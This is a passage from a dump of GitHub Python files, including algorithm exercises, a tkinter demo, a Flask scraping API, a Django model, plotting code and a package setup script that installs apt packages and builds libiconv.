children_objective_values])\n current_population = np.vstack([current_population, children_population])\n\n idxs = np.argsort(objective_values)\n current_population = current_population[idxs[:self.population_size], :]\n objective_values = objective_values[idxs[:self.population_size]]\n elif self.replace_method == 'lambda':\n current_population = children_population\n objective_values = children_objective_values\n \n return current_population, objective_values","repo_name":"jgrodzicki/UWR-II","sub_path":"Algorytmy Ewolucyjne/Assignment 2/SGA.py","file_name":"SGA.py","file_ext":"py","file_size_in_byte":8034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"5267155337","text":"import time\nimport tkinter\nimport tkinter.messagebox\n\ndef download():\n # 模拟下载任务需要花费10秒钟时间\n time.sleep(10)\n tkinter.messagebox.showinfo('提示', '下载完成!')\n\n# 显示信息\ndef show_about():\n tkinter.messagebox.showinfo('关于', '作者: 骆昊(v1.0)')\n\ndef main():\n # 建议一个页面\n top = tkinter.Tk()\n # 标题\n 
top.title('单线程')\n # 窗口大小\n top.geometry('200x150')\n top.wm_attributes('-topmost', True)\n\n # 面板\n panel = tkinter.Frame(top)\n # 下载 按钮\n button1 = tkinter.Button(panel, text='下载', command=download)\n button1.pack(side='left')\n # 关于 按钮\n button2 = tkinter.Button(panel, text='关于', command=show_about)\n button2.pack(side='right')\n panel.pack(side='bottom')\n\n tkinter.mainloop()\n\nif __name__ == '__main__':\n main()","repo_name":"PorterZhang2021/Python-StudyNotes","sub_path":"1.Python-100-Days-StudyNotes/基础篇/代码/Day13/code_8.py","file_name":"code_8.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"28025526495","text":"from flask import Flask, jsonify, request\nfrom flask_cors import CORS\nimport requests\nfrom bs4 import BeautifulSoup\n\napp = Flask(__name__)\nCORS(app)\n\n@app.route('/scrape', methods=['GET', 'POST'])\ndef scrape():\n if request.method == 'POST':\n url = request.form.get('url_to_scrape', 'http://localhost/my_git/python/app_1/test.html') # Use POST field if available\n else:\n url = 'http://localhost/my_git/python/app_1/test.html' # Default URL to scrape\n\n headers = {'User-Agent': 'Mozilla/5.0'}\n r = requests.get(url, headers=headers)\n \n if r.status_code == 200:\n soup = BeautifulSoup(r.content, 'html.parser')\n items = []\n\n for a_tag in soup.find_all('a', class_='something'):\n items.append(a_tag.text)\n\n return jsonify({'items': items})\n else:\n return jsonify({'error': 'Failed to retrieve data', 'status_code': r.status_code})\n\n@app.route('/another', methods=['GET'])\ndef another_route():\n page = request.args.get('page', 0, type=int)\n name = request.args.get('name', \"\", type=str)\n print(f\"Page variable is: {page}\")\n return jsonify({\"message\": \"Hello from another route!\", \"page\" : page, \"name\" : name})\n\n@app.route('/test', methods=['POST'])\ndef test_route():\n name = request.form.get('name', 'Anonymous') # Default to \"Anonymous\" if \"name\" is not provided\n return jsonify({\"message\": f\"Hello, {name}!\"})\n\nif __name__ == '__main__':\n app.run(port=5000)\n","repo_name":"xrvel/python","sub_path":"app_1/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"71759144435","text":"# 给定 m x n 矩阵 matrix 。\n#\n# 你可以从中选出任意数量的列并翻转其上的 每个 单元格。(即翻转后,单元格的值从 0 变成 1,或者从 1 变为 0 。)\n#\n# 返回 经过一些翻转后,行与行之间所有值都相等的最大行数 。\n#\n#\n#\n# 示例 1:\n#\n# 输入:matrix = [[0,1],[1,1]]\n# 输出:1\n# 解释:不进行翻转,有 1 行所有值都相等。\n# 示例 2:\n#\n# 输入:matrix = [[0,1],[1,0]]\n# 输出:2\n# 解释:翻转第一列的值之后,这两行都由相等的值组成。\n# 示例 3:\n#\n# 输入:matrix = [[0,0,0],[0,0,1],[1,1,0]]\n# 输出:2\n# 解释:翻转前两列的值之后,后两行由相等的值组成。\n#\n#\n# 提示:\n#\n# m == matrix.length\n# n == matrix[i].length\n# 1 <= m, n <= 300\n# matrix[i][j] == 0 或 1\nfrom collections import Counter\nfrom typing import List\n\n\nclass Solution:\n def maxEqualRowsAfterFlips1(self, matrix: List[List[int]]) -> int:\n r, c = len(matrix), len(matrix[0])\n n_group = 1\n group = [range(r)]\n def divide(l, j): # l 是一个分组的所有下标列表,第 j 列与第 0 列 对应行进行异或运算,按结果进行分组\n a, b = [], []\n for i in l:\n if matrix[i][0] ^ matrix[i][j]:\n a.append(i)\n else:\n b.append(i)\n if len(a) > len(b):\n return a, b\n return b, a\n for i in range(1, c):\n for k, g in enumerate(group):\n if len(g) == 0: continue\n a, b = divide(g, i)\n if len(b) == 0: continue\n group[k] = a\n group.append(b)\n return max(len(g) for g in group)\n\n def 
maxEqualRowsAfterFlips(self, matrix: List[List[int]]) -> int:\n # 更简洁的方法\n r, c = len(matrix), len(matrix[0])\n nums = [0] * r\n for i in range(r):\n reverse = True if matrix[i][0] == 1 else False\n for j in range(c):\n if reverse:\n matrix[i][j] ^= 1\n nums[i] = (nums[i] << 1) + matrix[i][j]\n c = Counter(nums)\n return max(c.values())\n\n","repo_name":"wangsun39/leetcode","sub_path":"all-code/1000-1100/1072maxEqualRowsAfterFlips.py","file_name":"1072maxEqualRowsAfterFlips.py","file_ext":"py","file_size_in_byte":2212,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"17694288372","text":"class SumNums():\n def __init__(self,nums,target):\n self.nums=nums\n self.target=target\n numbers=[]\n index=[]\n for i in self.nums:\n numbers.append(i)\n numbers.sort()\n numbers.reverse()\n for i in numbers:\n if self.target-i>=0:\n for j in self.nums:\n if i==j:\n index.append(self.nums.index(j))\n self.target-=i\n index.sort()\n for i in index:\n print('index-',i)\nprint(SumNums([2,4,3,1],7))","repo_name":"knnaliev95/InterviewPreparation","sub_path":"sumnums.py","file_name":"sumnums.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"40803889921","text":"import sys\nsys.stdin = open('input.txt', 'r')\n\n# 빨간 구슬을 구멍을통해 빼냄\n# 보드에 구멍이 하나 있따\n# 게임이 실패하는 경우 -1 을 출력한다\n# 1. 파란 구슬이 구멍에 들어가면 x 2. 동시에 빠져도 실패 3.더이상 구슬이 움직이지 x\n# 중력\n\nn, m = map(int, input().split())\narr = list(list(input()) for _ in range(n))\n\n################### DAY 9, 백준 코드랑 비교\nrx = ry = bx = by = gx = gy = 0\nfor i in range(n):\n for j in range(m):\n # 빨간 공\n if arr[i][j] == 'R':\n rx, ry = i, j\n arr[i][j] = '.'\n # 파란 공\n elif arr[i][j] == 'B':\n bx, by = i, j\n arr[i][j] = '.'\n elif arr[i][j] == 'O':\n gx, gy = i, j\n# print(gx, gy)\ndef inbox(x, y):\n if 0 <= x < n and 0 <= y < m and arr[x][y] != '#':\n return True\n else:\n return False\n\ndef gravity(x, y, dx, dy):\n\n while True:\n # 벽을 만나서 멈추면\n if not inbox(x, y):\n x -= dx\n y -= dy\n return x, y\n if x == gx and y == gy:\n return x, y\n x += dx\n y += dy\n\n\ndef bfs(ri, rj, bi, bj):\n visited = {(i, j, ii, jj): 0 for i in range(n) for j in range(m) for ii in range(n) for jj in range(m)}\n visited[(ri, rj, bi, bj)] = 1\n q = [(0, ri, rj, bi, bj)]\n while q:\n d, rx, ry, bx, by = q.pop(0)\n # if d > 10: return -1\n # print(d, rx, ry, bx, by)\n for dx, dy in (0, 1), (1, 0), (0, -1), (-1, 0):\n red = gravity(rx, ry, dx, dy)\n blue = gravity(bx, by, dx, dy)\n nrx, nry = red[0], red[1]\n nbx, nby = blue[0], blue[1]\n # 두 개다 빠진 경우\n if arr[nrx][nry] == 'O' and arr[nbx][nby] == 'O':\n continue\n # 두 개 좌표가 같을 경우\n # 더 가까이 있던 공을 위치로\n if red == blue:\n reddis = abs(rx-nrx) + abs(ry-nry)\n bluedis = abs(bx-nbx) + abs(by-nby)\n if reddis > bluedis:\n nrx -= dx\n nry -= dy\n else:\n nbx -= dx\n nby -= dy\n\n # 파란공만 빠진 경우\n if arr[nrx][nry] != 'O' and arr[nbx][nby] == 'O':\n continue\n # 빨간공이 빠졌을 경우\n if arr[nrx][nry] == 'O' and arr[nbx][nby] != 'O':\n return d+1\n if rx == nrx and ry == nry and bx == nbx and by == nby:continue\n if visited[(nrx, nry, nbx, nby)]: continue\n visited[(nrx, nry, nbx, nby)] = 1\n q.append((d+1, nrx, nry, nbx, nby))\n return -1\n\n\nprint(bfs(rx, ry, bx, by))\n# 뭐부터 검사해야하는지 순서가 무척 중요했다\n# 아... 
visited 체크를 안했다..바보다 바보 ..","repo_name":"sigk218/algorithm_100","sub_path":"2019-2020.08/93_baekjoon_구슬탈출.py","file_name":"93_baekjoon_구슬탈출.py","file_ext":"py","file_size_in_byte":2892,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"11235727402","text":"# pylint: disable=C0114, C0115, E5142\nfrom django.db import models\nfrom django.contrib.auth.models import User\n\n# Base class for all feed activities\nclass Activity(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n last_modified = models.DateTimeField(auto_now=True)\n\n class Meta:\n ordering = [\"-last_modified\"]\n","repo_name":"ChicoState/readerhub","sub_path":"app1/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"32422382603","text":"import re\n# Написать регулярное выражение, определяющее является ли данная строка \n#строкой \"abcdefghijklmnopqrstuv18340\" или нет.\ndef stringing(a):\n if not a :\n return False\n str='abcdefghijklmnopqrstuv18340'\n result = re.findall(a, str) \n if result==str.split():\n return True\n else:\n return False\n ","repo_name":"inessa111/Program-engineering-","sub_path":"Labs/LR1/module/lr1_2.py","file_name":"lr1_2.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"15550178052","text":"def solve(n, k):\n cnt = 0\n for d in range(1, n + 1):\n if n % d == 0:\n cnt += 1\n if cnt == k:\n return d\n return 0\n\nN, K = map(int, input().split())\nprint(solve(N, K))","repo_name":"joonion/computational-thinking-for-coding","sub_path":"Chap.04.Sorting&Searching/2501.약수구하기/solve.1.py","file_name":"solve.1.py","file_ext":"py","file_size_in_byte":210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"7593650262","text":"import matplotlib.pyplot as plt\nimport csv\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import cm\nfrom matplotlib.ticker import LinearLocator, FormatStrFormatter\nimport numpy as np\n\n\ndef read_grid(File):\n ''' \n read_grid - Reads a CSV file\n Parameters\n ----------\n File : CSV file\n \n Returns\n -------\n X : X axis of grid : Numpy array\n Y : Y axis of grid : Numpy array\n Grid : XY grid of energies : 2d numpy array\n '''\n Data = np.genfromtxt(File, delimiter=',', dtype=\"float\")\n \n X = Data[0]\n X = np.delete(X, 0)\n Y = (Data[:,0])\n Y = np.delete(Y, 0)\n\n Grid = np.array([])\n \n for i in range(1, (X.size + 1)):\n Temp = Data[:,i]\n Temp = np.delete(Temp, 0)\n Grid = np.append(Grid, Temp)\n \n Grid = np.reshape(Grid, (X.size, Y.size))\n return X, Y, Grid \n\ndef grid_plot(X, Y, Grid):\n '''\n grid_plot - Plot the energy surface\n \n Parameters\n ----------\n X : X axis of grid : Numpy array\n Y : Y axis of grid : Numpy array\n Grid : XY grid of energies : 2d numpy array\n '''\n X, Y = np.meshgrid(X, Y)\n plt.contourf(X, Y, Grid, 25, cmap='jet', interpolation='nearest')\n plt.xlabel(\"Displacement in X (\" r'$\\AA$' \")\", fontsize=18)\n plt.ylabel(\"Displacement in Y (\" r'$\\AA$' \")\", fontsize=18)\n plt.tick_params(labelsize=14)\n plt.tight_layout()\n plt.colorbar()\n plt.savefig(\"Surface_Plot.png\", dpi=600)\n plt.close()\n\n\n\nX, Y, Grid = read_grid(\"grid.csv\")\ngrid_plot(X, Y, 
Grid)\n\n\n\n","repo_name":"symmy596/Metadise_GB_Scripts","sub_path":"GB-Surface.py","file_name":"GB-Surface.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"25884598624","text":"from django.shortcuts import render, get_list_or_404\n\nfrom django.http import HttpResponse\nfrom .models import SkinType, SkinConcern, Option, Question, Questionnaire, QuestionnaireUserData, QuestionnaireEntry\nfrom home.models import Ingredient, Base, MixingAgent, Recipe, FacePack, CustomFacePack, SkinTypeIngredient, SkinTypeConcernIngredient\nfrom django.contrib.auth.models import User\nfrom cart.models import Cart\nfrom userregistration.views import init_user_login\nfrom home.views import cart_size, get_valid_user_data\nfrom django.db.models import Q\nimport json\nimport random\nimport pdb\n\n# Create your views here.\n\ndef wizard(request):\n data = [] \n for q in Question.objects.all():\n data.append({ \n 'id' : q.id,\n 'name' : q.name,\n 'why' : q.why,\n 'multiple' : 'multiple' if q.id == 8 else '',\n 'options' : [{\n 'name': o['option__name'],\n 'id': o['option__id'], \n 'helper': o['option__helper']\n } for o in Questionnaire.objects.filter(question=q).\\\n values('option__name','option__id',\n 'option__helper')]\n })\n return render(request, \"wizard.html\", \n { 'questions': data, \n 'cart_size': cart_size(request),\n 'valid_user': get_valid_user_data(request) })\n\ndef wizard_submit(request):\n json_response = { 'success': False }\n if request.method == 'POST':\n init_user_login(request)\n data = json.loads(request.POST['data'])\n user = request.user\n skinType = None\n skinConcerns = None\n wz = QuestionnaireUserData() \n wz.user = user\n wz.save()\n for d in data:\n for o in d['options']:\n qe = QuestionnaireEntry()\n qe.question = Question.objects.get(pk=d['id'])\n qe.option = Option.objects.get(pk=o)\n qe.wizard = wz\n qe.save()\n if d['id'] == '7':\n skinType = SkinType.objects.get(pk=d['options'][0]);\n if d['id'] == '8':\n skinConcerns = SkinConcern.objects.filter(id__in=d['options'])\n recipes = Recipe.objects.filter(skin_type=skinType, skin_concern__in=skinConcerns)\n recipes_ing = [r.mandatory_ingredient for r in recipes]\n skin_type_ingredients = Ingredient.objects.filter(id__in=SkinTypeIngredient.objects.filter(skin_type=skinType).values('ingredient'))\n o_ids = []\n for r in recipes:\n ri = random.choice(SkinTypeConcernIngredient.objects\\\n .filter(skin_type=r.skin_type, skin_concern=r.skin_concern)\\\n .filter(~Q(ingredient=r.mandatory_ingredient), ~Q(ingredient_id__in=o_ids))).ingredient\n o_ids.append(ri)\n base = random.choice(Base.objects.filter(skin_type=skinType))\n \"\"\"\n Base conditions:\n 1. French green clay cannot be used for people with skin concern \"Sensitive\n and irritated by harsh ingredients\"\n 2. For skin combination oily and skin concern \" sensitive and irritated by\n harsh ingredients\" : always use white kaolin clay\n 3. 
For skin combination dry and skin concern \" sensitive and irritated by \n harsh ingredients\" : always use white goat milk powder\n \"\"\"\n if SkinConcern.objects.get(name__contains=\"Sensitive\") in skinConcerns:\n if skinType.name == 'Oily':\n base = Base.objects.get(name__contains='White Kaolin Clay')\n elif skinType.name == 'Dry':\n base = Base.objects.get(name__contains='Goat Milk')\n else:\n base = random.choice(Base.objects.filter(skin_type=skinType)\\\n .filter(~Q(pk=Base.objects.get(name__contains='French').id)))\n mixing_agent = random.choice(MixingAgent.objects.filter(skin_type=skinType))\n json_response = {\n 'base'\t : str(base.id),\n 'mixing_agent' : str(mixing_agent.id),\n 'recipes' : [str(r.id) for r in recipes],\n 'optional' : [str(o.id) for o in o_ids],\n 'qd' : str(wz.id),\n } \n return HttpResponse(json.dumps(json_response, ensure_ascii=False))\n\ndef results(request):\n if request and request.method == 'GET':\n init_user_login(request)\n user = request.user\n recipe_ids = [int(x) for x in request.GET.getlist('recipes[]')]\n o_ids = [int(x) for x in request.GET.getlist('optional[]')]\n recipes = Recipe.objects.filter(id__in=recipe_ids)\n secondary_ings = Ingredient.objects.filter(id__in=o_ids)\n qd_id = request.GET.get('qd')\n skin_type = request.GET.get('skin_type', None)\n base = Base.objects.get(pk=request.GET.get('base'))\n mixing_agent = MixingAgent.objects.get(pk=request.GET.get('mixing_agent'))\n #secondary_ings = [random.choice(SkinTypeConcernIngredient.objects\\\n #.filter(skin_type=r.skin_type, skin_concern=r.skin_concern)\\\n #.filter(~Q(ingredient=r.mandatory_ingredient))).ingredient\\\n #for r in recipes]\n essential_oils = Ingredient.objects.get(name__contains=\"Essential Oils\")\n r1 = recipes[0]\n r2 = recipes[1]\n r3 = recipes[2]\n o1 = secondary_ings[0]\n o2 = secondary_ings[1]\n o3 = secondary_ings[2]\n o_ids = [i.id for i in secondary_ings]\n\n data = {\n 'first': {\n 'type': 'primary',\n 'base': {\n 'id': base.id,\n 'name': base.name,\n 'image': base.image,\n 'helper': base.helper,\n 'description': base.description, \n },\n 'mixing_agent': {\n 'id': mixing_agent.id,\n 'name': mixing_agent.name,\n 'image': mixing_agent.image,\n 'helper': mixing_agent.helper,\n 'description': mixing_agent.description, \n },\n 'essential_oils': {\n 'id': essential_oils.id,\n 'name': essential_oils.name,\n 'image': essential_oils.image,\n 'helper': essential_oils.helper,\n 'description': essential_oils.description,\n },\n 'recipes': [{\n 'id': r.id,\n 'i_id': r.mandatory_ingredient.id,\n 'i_name': r.mandatory_ingredient.name,\n 'i_image': r.mandatory_ingredient.image,\n 'i_helper': r.mandatory_ingredient.helper,\n 'i_description': r.mandatory_ingredient.description,\n } for r in recipes],\n 'b_id': base.id,\n 'm_id': mixing_agent.id,\n 'r1_id': r1.id,\n 'r2_id': r2.id,\n 'r3_id': r3.id,\n 'o_ids': [],\n 'qd_id': qd_id,\n },\n 'second': {\n 'type': 'secondary',\n 'base': {\n 'id': base.id,\n 'name': base.name,\n 'image': base.image,\n 'helper': base.helper,\n 'description': base.description, \n },\n 'mixing_agent': {\n 'id': mixing_agent.id,\n 'name': mixing_agent.name,\n 'image': mixing_agent.image,\n 'helper': mixing_agent.helper,\n 'description': mixing_agent.description, \n },\n 'essential_oils': {\n 'id': essential_oils.id,\n 'name': essential_oils.name,\n 'image': essential_oils.image,\n 'helper': essential_oils.helper,\n 'description': essential_oils.description,\n },\n #'recipes': [{\n #'id': r.id,\n #'i_id': r.mandatory_ingredient.id,\n #'i_name': 
r.mandatory_ingredient.name,\n #'i_image': r.mandatory_ingredient.image,\n #'i_helper': r.mandatory_ingredient.helper,\n #'i_description': r.mandatory_ingredient.description,\n #} for r in recipes],\n 'recipes': [{\n 'id': i.id,\n 'i_id': i.id,\n 'i_name': i.name,\n 'i_image': i.image,\n 'i_helper': i.helper,\n 'i_description': i.description,\n } for i in secondary_ings],\n 'b_id': base.id,\n 'm_id': mixing_agent.id,\n 'r1_id': r1.id,\n 'r2_id': r2.id,\n 'r3_id': r3.id,\n 'o1_id': o1.id,\n 'o2_id': o2.id,\n 'o3_id': o3.id,\n 'o_ids': o_ids,\n 'qd_id': qd_id,\n },\n 'qd_id': qd_id,\n 'skin_type': skin_type,\n }\n data['cart_size'] = cart_size(request)\n data['valid_user'] = get_valid_user_data(request)\n return render(request, \"results.html\", data)\n","repo_name":"dev1farms2face/f2f","sub_path":"farms2face/facepackwizard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"36874617680","text":"# Files\nfname = input(\"Enter file name: \")\nfh = open(fname)\ncount = 0\nsun = 0\nfor line in fh:\n if line.startswith(\"X-DSPAM-Confidence:\"):\n ipos = line.find(\":\")\n piece = line[ipos+1:]\n value = float(piece)\n count = count + 1\n sun = sun + value\nprint('Average spam confidence:', sun/count)","repo_name":"revacprogramming/python01-Tejadithya","sub_path":"ActivitySet01/problem08.py","file_name":"problem08.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"5437539935","text":"import time\nimport sys\n\nstart_time = time.time()\n\nfor line in sys.stdin:\n # solution found, print time\n if \"--\" in line:\n p = (time.time()-start_time)\n print(p)\n sys.stdout.write(line)\n sys.stdout.flush()","repo_name":"slipstreaming2/dissertation","sub_path":"bash/timingObjective.py","file_name":"timingObjective.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"39"} +{"seq_id":"1605912163","text":"import urllib.request\nimport urllib.parse\n\n#1、确定爬取网页的url地址\nurl ='http://www.baidu.com/s'\nheader = {\n \"User-Agent\" : \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36\",\n \"Connection\" : \"keep-alive\"\n}\n\n\nwd = {'wd':'吴京'}\nurlwd = urllib.parse.urlencode(wd)\nurl = url+'?'+urlwd\n#2、根据url获取网页信息\nurlRequest = urllib.request.Request(url, headers=header)\n\n\nresponse = urllib.request.urlopen(urlRequest)\n\n# print(type(urlRequest))\n# print(type(response))\n# print(response.getcode())\n# print(response.getheader(name=\"User-Agent\"))\n# print(urlRequest.get_header('Connection'))\n# print(urlRequest.get_header(\"User-Agent\"))\n\nprint(response.geturl())\nprint(response.read().decode('utf-8'))","repo_name":"typeme/python_spider_study","sub_path":"Day05/demo01.py","file_name":"demo01.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"33086828747","text":"def say_hello(name):\n return \"Hi my name is {}\".format(name)\n # takes in a name and returns the string \"Hi my name is \" plus the name\n # use whichever form of interpolation is most appropriate\n\ndef replace_given_substring(str_to_replace, str_to_insert, string):\n return string.replace(str_to_replace, str_to_insert)\n # this function takes three 
parameters --\n # the first is the substring we would like to replace.\n # the second substring is what we would like to use inplace of the first\n # the third is the actual string which we want to operate on\n # the function should return the new string\n\ndef remove_duplicate_punctuation(string_var):\n import string\n new_string = ''\n punctuation = string.punctuation\n for x in range(1,(len(string_var))):\n if string_var[x-1] not in punctuation:\n new_string = new_string + string_var[x-1]\n elif string_var[x-1] != string_var[x]:\n new_string = new_string + string_var[x-1]\n return new_string + string_var[-1]\n # should remove all duplicate punctuation marks in a given string\n # i.e. \"Hi!!!!!!\" should be reformatted to \"Hi!\"\n # i.e. \"Hello..... My name is Terrance!! How are you???\" -> \"Hello. My name is Terrance! How are you?\"\n\n\ndef validate_email_format(email):\n import string\n if email.count('@') == 1 and email.count('.com') == 1:\n special_char = string.punctuation\n person_part = (email.split('@'))[0]\n correct_email = ''\n for char in person_part:\n if char not in special_char:\n correct_email = correct_email + char\n if correct_email == person_part:\n return True\n else:\n return False\n else:\n return False\n\n # should make sure there are no special characters (i.e. *,~,#,$,%,&,(,),`,\",',:,;,/,>,<)\n # make sure the email contains an @ symbol and a .com\n # return True if format passes tests, return False otherwise\n\n\ndef anonymize_credit_card_number(credit_card_number):\n credit_card = credit_card_number[:-4]\n ccn = ''\n for char in credit_card:\n try:\n if type(int(char)) == int:\n ccn = ccn + 'X'\n except:\n ccn = ccn + char\n return ccn + credit_card_number[-4:]\n # should replace all characters except the last 4 with 'X'\n # return the anonymized credit card number as a string\n # the credit card may have characters that are not numbers (i.e. spaces and dashes, which we would want to keep)\n # i.e. 
1234-5678-90-1234 -> XXXX-XXXX-XX-1234\n","repo_name":"ptbailey/python-strings-indepth-lab","sub_path":"string_functions.py","file_name":"string_functions.py","file_ext":"py","file_size_in_byte":2562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"39"} +{"seq_id":"20247404948","text":"from random import randrange\nA =[1,2,3,4,5]\n\ndef shuffle(A):\n #i from 0 - n-1 \n for i in range(len(A)-1):\n #j from i to n\n j =randrange(i,len(A))\n A[i],A[j]=A[j],A[i]\n#[4, 5, 1, 2, 3]\n","repo_name":"Boom-Ba/Math","sub_path":"Probability/shuffle.py","file_name":"shuffle.py","file_ext":"py","file_size_in_byte":195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"16983654292","text":"class Solution:\n def findWinners(self, matches: List[List[int]]) -> List[List[int]]:\n wins = defaultdict(int)\n losses = defaultdict(int)\n \n undefeated = []\n oneloss = []\n for m in matches:\n wins[m[0]] += 1\n losses[m[1]] += 1\n \n minplayer = min(min(wins.keys()), min(losses.keys()))\n maxplayer = max(max(wins.keys()), max(losses.keys()))\n \n for n in range(minplayer, maxplayer+1):\n if losses[n] == 0 and wins[n] > 0:\n undefeated.append(n)\n elif losses[n] == 1:\n oneloss.append(n)\n \n return [undefeated, oneloss]","repo_name":"dyhliang/Leetcode","sub_path":"2225-find-players-with-zero-or-one-losses/2225-find-players-with-zero-or-one-losses.py","file_name":"2225-find-players-with-zero-or-one-losses.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"42831323523","text":"__author__ = \"Riccardo Cagnasso \"\n\nimport collections as coll\n\n\nclass PickOne(object):\n \"\"\"\n PickOne is a class that you use for asking the user to choose between\n some options\n\n Arguments:\n choiches --- the available options between the user can choose. It can\n be an array or a dictionary. In the first case the keys are int from 0\n to len-1.\n\n Keyword arguments:\n message (optional) --- the message to be displayed when asking for\n input. 
It's a template for \"format\" function and receives the\n \"{choices}\" and the {default} parameter.\n errormessage (optional) --- the message to be displayed when the user\n entered a incorrect answer\n default (optional) --- a default value to use if user provides no input\n \"\"\"\n def __init__(self, choices,\n message=\"Choose one from [{choices}]{default}{cancelmessage}: \",\n errormessage=\"Invalid input\", default=None, cancel=False, cancelkey='c',\n cancelmessage='(press {cancelkey} to cancel)'):\n self.message = message\n self.errormessage = errormessage\n\n self.cancel = cancel\n self.cancelkey = cancelkey\n self.cancelmessage = cancelmessage\n\n if type(choices) == list:\n self.choices = coll.OrderedDict(\n zip(map(str, range(0, len(choices))), choices))\n elif issubclass(choices.__class__, dict):\n self.choices = coll.OrderedDict([(str(k), v)\n for k, v in choices.items()])\n\n self.default = default\n\n def buildPrompt(self):\n choices = [\"{key}={choice}\".format(key=key, choice=choice)\n for key, choice in self.choices.items()]\n\n if self.default is not None:\n default = \" (default={default})\".format(default=self.default)\n else:\n default = \"\"\n\n if self.cancel:\n cancelmessage = self.cancelmessage.format(cancelkey=self.cancelkey)\n else:\n cancelmessage = ''\n\n return self.message.format(choices=\" \".join(choices), default=default,\n cancelmessage=cancelmessage)\n\n def ask(self):\n \"\"\"\n The ask method is used to get the input from users\n \"\"\"\n while True:\n i = input(self.buildPrompt())\n\n if self.cancel and i == self.cancelkey:\n return None\n\n if i == \"\" and self.default is not None:\n i = self.default\n\n if i in self.choices:\n return self.choices[i]\n else:\n for k, v in self.choices.items():\n if i == str(v):\n return self.choices[k]\n\n print(self.errormessage)\n\n\ndef ask(choices,\n message=\"Choose one from [{choices}]{default}{cancelmessage}: \",\n errormessage=\"Invalid input\", default=None,\n cancel=False, cancelkey='c',\n cancelmessage='press {cancelkey} to cancel'):\n \"\"\"\n ask is a shorcut instantiate PickOne and use .ask method\n \"\"\"\n\n return PickOne(choices, message, errormessage, default, cancel, cancelkey,\n cancelmessage).ask()\n","repo_name":"riccardocagnasso/pickone","sub_path":"pickone/pickone.py","file_name":"pickone.py","file_ext":"py","file_size_in_byte":3166,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"11408728909","text":"\"\"\"Split and merge color channels\"\"\"\nimport cv2\nimage=cv2.imread(\"image2.png\")\nb,g,r=cv2.split(image)\n\ncv2.imshow(\"Red\",r)\ncv2.imshow(\"Green\",g)\ncv2.imshow(\"Blue\",b)\n\nmerged=cv2.merge((r,g,b))\ncv2.imshow(\"Merged\",merged)\n\nif cv2.waitKey(0)==27:\n\tcv2.destroyAllWindows()\n","repo_name":"glen-s-abraham/sem3record","sub_path":"DIP/splitColorChannel.py","file_name":"splitColorChannel.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"40083050049","text":"# coding=utf-8\nimport sys\nfrom os import path\nfrom simplejson import load\nfrom subprocess import call\nfrom cloud import login\nfrom cloud import add_server\nfrom requests import Session\nfrom utility import exit_with_msg\nfrom utility import print_info\nfrom utility import print_error\nfrom utility import parseArg\n\n\ndef assert_ext(ext_file):\n if (path.isfile(ext_file) == False):\n exit_with_msg('file ext.json does not exist.')\n\n\ndef 
create_and_exec_install_shell(ext_object):\n try:\n cmd = '#!/bin/bash\\nsudo apt-get update\\n'\n for package_name in ext_object['install_packages']:\n cmd += 'sudo apt-get install -y %s\\n' % package_name\n install_shell = open('./install.sh', 'w+')\n cmd += '\\n'\n install_shell.write(cmd)\n install_shell.close()\n ret = call('sudo chmod a+x install.sh', shell=True)\n if (ret != 0):\n exit_with_msg('chmod for install')\n ret = call('./install.sh', shell=True)\n if (ret != 0):\n exit_with_msg('exec install.sh')\n ret = call('sudo rm -f install.sh', shell=True)\n if (ret != 0):\n exit_with_msg('rm install.sh')\n except KeyboardInterrupt:\n print_info('Keyboard interrupt by user - when install shell')\n sys.exit(1)\n except IOError:\n print_error('IO Error - when install shell')\n sys.exit(1)\n\n\ndef dowload_compile_and_install_libiconv():\n try:\n cmd = \"axel https://ftp.gnu.org/pub/gnu/libiconv/libiconv-1.15.tar.gz\\n \\\n tar -xvf libiconv-1.15.tar.gz\\n \\\n cd libiconv-1.15\\n \\\n sudo ./configure --prefix=/usr/local\\n \\\n sudo make\\n \\\n sudo make install\\n 